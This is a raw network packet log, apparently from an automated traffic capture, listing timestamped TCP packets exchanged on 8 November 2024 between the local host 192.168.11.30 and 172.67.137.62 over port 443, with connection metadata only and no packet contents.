                                                                                                        Nov 8, 2024 11:12:04.812510967 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.812515020 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.812586069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.812586069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.812609911 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.812655926 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.812655926 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813343048 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.813357115 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.813508987 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813508987 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813560963 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813560963 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813568115 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.813606977 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.813627958 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814389944 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.814405918 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.814563036 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814563036 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814574003 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.814580917 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814655066 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814655066 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.814680099 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.815190077 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.815203905 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.815382957 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.815382957 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.815393925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.815402031 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.815402031 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.815480947 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816245079 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.816262007 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.816409111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816409111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816420078 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.816427946 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816500902 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816500902 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.816550016 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.817068100 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.817081928 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.817302942 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.817302942 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.817313910 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.817326069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.817423105 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.818008900 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.818025112 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.818147898 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.818154097 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.818248034 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.818248034 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.818342924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.818988085 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.819003105 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.819175005 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.819175005 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.819181919 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.819226027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.819298029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.819900990 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.819917917 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.820110083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.820110083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.820121050 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.820131063 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.820178986 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.820230961 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.820964098 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.820981979 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.821136951 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.821144104 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.821157932 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.821157932 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.821258068 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.821258068 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.821846008 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.821861982 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.822007895 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822007895 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822057962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822061062 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.822153091 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822153091 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822205067 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822693110 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.822710037 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.822841883 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822841883 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822846889 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.822938919 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.822997093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.823640108 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.823653936 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.823806047 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.823843002 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.823843002 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.823848963 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.823940039 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.824623108 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.824640036 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.824795008 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.824795008 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.824805021 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.824814081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.824949980 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.825500965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.825515985 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.825637102 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.825637102 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.825769901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.825769901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.825781107 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.826581001 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.826596975 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.826728106 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.826738119 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.826819897 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.826925993 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.827334881 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.827349901 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.827521086 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.827527046 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.827569962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.827619076 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.828448057 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.828465939 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.828588009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.828588009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.828594923 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.828656912 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.828656912 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.828742981 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.829274893 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.829289913 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.829420090 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.829420090 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.829586983 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.829586983 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.829591990 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.830375910 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.830393076 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.830535889 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.830535889 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.830542088 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.830584049 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.830584049 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.830704927 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831166029 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.831181049 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.831342936 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831342936 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831396103 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831448078 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831448078 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.831458092 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.831470013 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.832102060 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.832118988 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.832320929 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.832320929 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.832331896 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.832339048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.832420111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.833472013 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.833484888 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.833659887 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.833671093 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.833828926 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.834089041 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.834105015 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.834259987 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.834259987 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.834270954 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.834321976 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.834414005 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835130930 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.835145950 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.835298061 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835298061 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835350990 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835413933 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835423946 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.835808992 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.835825920 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.835957050 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835957050 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.835962057 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.836004972 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.836056948 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.836056948 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.836105108 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837178946 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.837188959 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.837311029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837311029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837389946 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837454081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837460041 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.837503910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837820053 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.837831020 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.837996006 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.837999105 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.838051081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.838097095 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.838453054 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.838586092 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.838716984 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840323925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.840498924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840511084 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.840548038 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.840558052 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840563059 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.840636015 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840686083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840686083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840739012 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840739012 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840787888 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840787888 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.840836048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.841298103 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.841312885 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.841450930 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.841577053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.841583014 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.841718912 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.842727900 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.842745066 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.842911959 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.842962980 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.842962980 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.842962980 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.842968941 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.843107939 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.843139887 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.843156099 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.843278885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.843278885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.843327999 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.843333006 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.843421936 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.843471050 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.844223022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.844237089 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.844383955 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.844461918 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.844466925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.844526052 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.844604015 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.845258951 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.845273018 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.845396996 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.845448017 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.845448017 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.845453978 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.845542908 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.845604897 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.846158981 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.846175909 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.846321106 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.846321106 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.846370935 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.846374989 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.846415043 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.846528053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847181082 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.847196102 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.847335100 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847336054 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847381115 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847381115 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847384930 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.847431898 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.847532988 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848400116 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.848416090 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.848545074 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848545074 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848639965 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848639965 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848644972 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.848686934 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.848787069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849401951 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.849417925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.849545956 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849591970 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849591970 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849597931 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.849639893 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849639893 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849805117 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.849932909 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.849946022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.850105047 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850105047 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850153923 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850158930 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.850202084 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850250959 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850303888 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850811005 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.850827932 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.850949049 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.850997925 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851078033 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851083040 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.851221085 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851574898 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.851591110 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.851715088 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851767063 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851767063 CET49786443192.168.11.30172.67.137.62
